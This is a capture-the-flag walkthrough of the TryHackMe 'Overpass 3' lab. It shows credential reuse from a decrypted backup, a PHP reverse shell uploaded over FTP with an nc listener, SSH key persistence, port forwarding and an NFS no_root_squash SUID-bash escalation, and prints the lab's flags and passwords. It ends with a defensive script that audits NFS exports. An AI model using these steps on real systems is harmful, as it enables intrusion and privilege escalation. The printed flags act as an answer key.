THM Machine: Overpass 3 - Hosting

Last updated 2 years ago

Task 1 Overpass3 - Adventures in Hosting

Overview

After Overpass's rocky start in infosec and the commercial failure of their password manager and subsequent hack, they've decided to try a new business venture.

Overpass has become a web hosting company! Unfortunately, they haven't learned from their past mistakes. Rumor has it, their main web server is extremely vulnerable.

Let's start hacking!

Information Gathering

Machine IP : 10.10.96.246

Scanning

Nmap Scanning Report

$ sudo nmap -sCV -A -p 21,22,80 10.10.96.246

Nmap scan report for 10.10.96.246
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (94%), Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   200.00 ms 10.8.0.1
2   200.00 ms 10.10.96.246
  1. Total Open Ports: 3

  2. Port Number: 21,22,80

  3. Services: ftp,ssh,http

  4. Services Versions: vsftpd 3.0.3, OpenSSH 8.0 (protocol 2.0), Apache httpd 2.4.37 ((centos))

  5. Operating System: Linux (CentOS)

Enumeration

Three services are running on the target system, so the next step is to enumerate each of them. Let's start.

HTTP Enumeration

The target has an HTTP server running, so our first starting point is the website itself. Let's visit it.

Above is the main web page. There is nothing else there, just regular static pages with some information about Overpass and nothing more.

As we could not find anything special on the site, the next step is directory scanning to find hidden directories. Hidden directories are directories that exist on the site but are not linked from any page of the website.

ffuf Directory Scanning

$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://10.10.96.246/FUZZ -ic

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.96.246/FUZZ
 :: Wordlist         : FUZZ: directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 1770, Words: 443, Lines: 37]
backups                 [Status: 301, Size: 236, Words: 14, Lines: 8]
                        [Status: 200, Size: 1770, Words: 443, Lines: 37]
:: Progress: [87651/87651] :: Job [1/1] :: 209 req/sec :: Duration: [0:08:30] :: Errors: 9 ::

So we found one hidden directory named backups; let's visit it.

We can only see one file there, named backup.zip, so let's download it and see what is inside.

As we can see above, there are two files in backup.zip:

  • priv.key

  • CustomerDetails.xlsx.gpg

When we use the file command on priv.key we see the following output. It shows that priv.key is a PGP private key block. When I googled it to learn a little more, I found out that it is a private key used to decrypt files that were encrypted with the matching public key.

The other file is encrypted, and as the name shows it is about Overpass's customers. It was encrypted with PGP (GnuPG), so we cannot see its content without decrypting it with the private key, but luckily we have the private key.


So we have the private key; now let's decrypt the file and see its content. To decrypt it we need the gnupg package, which we can install with the following command.

Command: sudo apt install gnupg

Once it is installed we use the gpg command. Running it for the first time creates a gpg directory (~/.gnupg) on our system. After that we import the private key into our gpg keyring with the following command.

Command: gpg --import priv.key

This adds the private key, and now we can decrypt the file with the following command

Command: gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx

This command decrypts the file and saves its content to CustomerDetails.xlsx in our present working directory. If everything goes fine we see the following files in our directory.

Now when I use the file command on CustomerDetails.xlsx it shows the following file type

It is an Excel file, so we can open it in Excel and see its content.

Above is the content of the file: Customer Name, Username, Password and Credit Card Number with CVC. But wait, we saw some of these names previously on the main page of the website, Paradox and MuirlandOracle. I wondered whether the usernames and passwords were also reused on other services like SSH and FTP. After checking, they do not work for SSH, but they do work for the FTP service running on the server.

After successfully logging in to the FTP server with the username paradox and the password ShibesAreGreat123, we can use the ls command to see what is there. This is the website's root directory: we can see the backups directory, index.html, main.css etc.

Now we can try to put a PHP reverse shell there; if the application executes PHP files, we get a reverse shell back to our attacker machine. Download the PHP reverse shell to the attacker machine, then edit the IP address to our own IP and change the port number to one of our choice.

Now we are ready to upload shell.php to the target system. Connect to the target FTP server using the following command syntax

Syntax: ftp Target_IP_Here (log in as paradox with the password ShibesAreGreat123)

Once connected to the FTP server, use the following command to upload the shell to the target web directory

ftp> put shell.php

This will upload the shell.php to the target system.

Note: if shell.php is in another directory, give the full path to the file.

Exploitation

Now that we have uploaded shell.php to the target system, it is time to get the connection. First start a listener on our system with the following command

$ nc -lvnp 4444

Where 4444 is the port number set in shell.php. Once the listener is running, open the link in your browser or use the following command to trigger shell.php; if the server executes PHP files, we get the connection back.

$ curl http://Target_IP/shell.php

And we indeed got the connection back to our listener. If you run the id command you will see you are logged in as the apache user. Run cd with no arguments to go to its home directory; there you will see the web flag. Now we should upgrade the shell.

Shell Upgrade

Currently our shell is very limited: if we press Ctrl+C by accident the shell closes, and we cannot use any command that needs a proper terminal (e.g. nano or su) because our current shell does not have a proper TTY. We can fix it using the following commands.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

After that press Ctrl+Z to background the netcat shell, go back to your system's native shell and run the following command

$ stty raw -echo

Now use the fg command to return to the netcat reverse shell and hit Enter twice or run the reset command. You now have a better TTY shell. To improve it further, press Ctrl+Z again to background the nc terminal and type the following command

$ echo $TERM

This shows a value like xterm-256color; remember it and then run the following command

$ stty size

This prints two numbers like 20 120: the first is the number of rows and the second the number of columns. Note both values, use fg to return to your nc shell and run the following commands (substituting the values you noted)

$ export TERM=xterm-256color

$ stty rows 30 columns 120

Once you have done that, the netcat shell behaves like an SSH shell.

Privilege Escalation

We have the FTP credentials for the paradox user, so we can try them locally for privilege escalation. Use the following command to switch to the paradox user

$ su paradox
password: ShibesAreGreat123

When we run ls -al in the paradox user's home directory we see the following result

There is a directory named .ssh; inside it we see the following files

There are only two files there, authorized_keys and id_rsa.pub, so there is no SSH private key. We can only connect over SSH if we add our own SSH public key to the authorized_keys file. To do that, first create an SSH key pair on our attacking system with the following command

$ ssh-keygen -f rsa

This creates a key pair on our attacking system: with -f rsa the files are written to the current directory as rsa (private key) and rsa.pub (public key); without -f, ssh-keygen defaults to id_rsa and id_rsa.pub in ~/.ssh. Use cat on the .pub file to see its content and copy it. Now go back to the netcat reverse shell (as paradox) and use the following command in /home/paradox/.ssh to edit the authorized_keys file

$ nano authorized_keys

Paste your public key there, and now you can SSH to the target with the following command

$ ssh paradox@Target_IP

Now you have an SSH connection as well. Next we search for common privilege escalation vectors; for that we can use linpeas.sh. Download it on your system and copy it to the target with scp using the following command

$ scp ./linpeas.sh paradox@Target_IP:/tmp

This copies linpeas.sh into the target's /tmp directory using the paradox SSH account, so when we go there we can see the file.

Now we can run linpeas.sh to find privilege escalation vectors, but first we have to make it executable with the following command

$ chmod +x linpeas.sh

And now we can run it using the following command.

$ ./linpeas.sh

As we can see from the linpeas.sh result there is no direct root privilege escalation vector, but there is an NFS service running on the box.

But we did not see any NFS service in the Nmap scan. That means NFS is only listening on localhost, so we cannot reach it remotely, at least not directly. We can reach it with port forwarding: through our SSH connection we forward a port that is only reachable on the target's private side to a port on our own system. We can do this with ssh using the following syntax.

syntax: ssh -L Local_Port:Destination_Host:Remote_Port user@Target_IP (Destination_Host is where the service listens as seen from the target, so 127.0.0.1 for a localhost-only service)

The NFS share is exported from the james user's home directory, and linpeas also gives us a link about the misconfiguration that may be used for privilege escalation, so we can visit it to learn about it.

The page linked by linpeas explains that if we mount that NFS share on our attacking system, we can copy the /bin/bash binary into the mounted share and set the SUID bit on it from our side. Because the export does not squash root (the no_root_squash option), the permission change made by root on our side is honoured by the server, so the same binary shows up on the remote system with the SUID bit set there as well, and running it gives us elevated privileges.

Now let's put that theory into action. First we have to mount that share on our attacking system, but before that we have to forward the port to our system with ssh as mentioned above, using the following command

$ ssh -L 2049:127.0.0.1:2049 paradox@Target_IP

This forwards port 2049, the NFS port, on the target's localhost to port 2049 on our system. I used the command rpcinfo -p on the target to find out which port the NFS server is running on.

So now we can mount that share on our system using the following command

$ sudo mount -t nfs localhost:/ /mnt/nfs

If everything goes right, the share is mounted on our system (create /mnt/nfs first if it does not exist). There we find the user.txt flag, and when we run ls -al we see a directory named .ssh that contains the james user's SSH private key, which we have read and write permission on. We can read the key with cat, copy it to our attacking system, and restrict its permissions with chmod 600 id.rsa so that only we can read it. Now we can SSH as james using that private key with the command ssh -i id.rsa james@Target_IP. With SSH access as james, let's try to get root by following these steps:

  1. As the james user, copy the /bin/bash binary to the home directory with the following command

$ cp /bin/bash /home/james

  2. Now go to the directory on your system where you mounted the james NFS share.

$ cd /mnt/nfs

  3. When you run ls -al there you see the bash binary, but with its normal permissions.

  4. Now let's put the theory discussed above into practice: from our attacking system we change the permissions of that file

$ chmod +s /mnt/nfs/bash

We can see from the james account that the binary now has the SUID bit set, so we can get root privileges with the following command

$ ./bash -p

So that is how the NFS vulnerability works: linpeas.sh showed us the link, we went there and learned about it, and using it we got root privileges.
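The NFS weakness described above, seen from the defender's side, as an added example that is not part of the original writeup: it parses exports(5)-style lines (a constructed sample, not the target's real configuration), flags the no_root_squash option the SUID trick depends on together with read-write exports to any host, and rewrites the exports so root is squashed.

```python
import re

# Constructed sample exports file for the demo, not the target's real config.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed example)
/home/james *(rw,sync,no_root_squash)
/srv/public 10.0.0.0/8(ro,sync)
/data 192.168.1.10(rw,no_root_squash) 192.168.1.11(ro)
"""

# One client spec: optional host, optional "(opt,opt)" suffix.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return (path, host, [options]) for every client spec in exports(5) text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients or ["*"]:  # a path with no client is exported to everyone
            m = CLIENT_RE.match(spec)
            host = m.group(1) or "*"
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            entries.append((path, host, opts))
    return entries


def audit_exports(text):
    """Return (path, host, issue) findings for the misconfigurations abused above."""
    findings = []
    for path, host, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash: client root can plant "
                             "root-owned SUID binaries in the share"))
        if host == "*" and "rw" in opts:
            findings.append((path, host, "rw export to any host"))
    return findings


def harden(text):
    """Rewrite exports text so root is squashed on every client spec."""
    return re.sub(r"\bno_root_squash\b", "root_squash", text)


if __name__ == "__main__":
    for path, host, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} [{host}]: {issue}")
    print("hardened:\n" + harden(SAMPLE_EXPORTS))
```

Run it against a real /etc/exports by reading the file into audit_exports; any no_root_squash finding means a root user on an allowed client can do exactly what the writeup did.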

Flags

Web Flag: thm{0ae72f7870c3687129f7a824194be09d}

User Flag: thm{3693fc86661faa21f16ac9508a43e1ae}

Root Flag: thm{a4f6adb70371a4bceb32988417456c44}
